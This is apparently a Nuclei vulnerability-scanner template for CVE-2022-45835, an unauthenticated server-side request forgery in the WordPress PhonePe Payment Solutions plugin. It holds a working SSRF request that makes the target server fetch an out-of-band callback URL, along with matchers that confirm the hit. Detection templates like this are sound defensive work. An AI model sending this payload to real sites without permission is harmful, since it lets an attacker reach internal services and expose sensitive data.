nuclei-templates/cves/2022/CVE-2022-45835.yaml

39 lines
1.3 KiB
YAML

id: CVE-2022-45835
info:
name: WordPress PhonePe Payment Solutions Plugin <= 1.0.15 - Server Side Request Forgery (SSRF)
author: theamanrawat
severity: high
description: |
Server Side Request Forgery (SSRF) vulnerability in WordPress PhonePe Payment Solutions Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information of other services running on the system.
remediation: Fixed in version 2.0.0
reference:
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
- https://wordpress.org/plugins/phonepe-payment-solutions/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45835
metadata:
verified: "true"
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe
requests:
- raw:
- |
GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "cURL Test for PhonePe"
- type: status
status:
- 200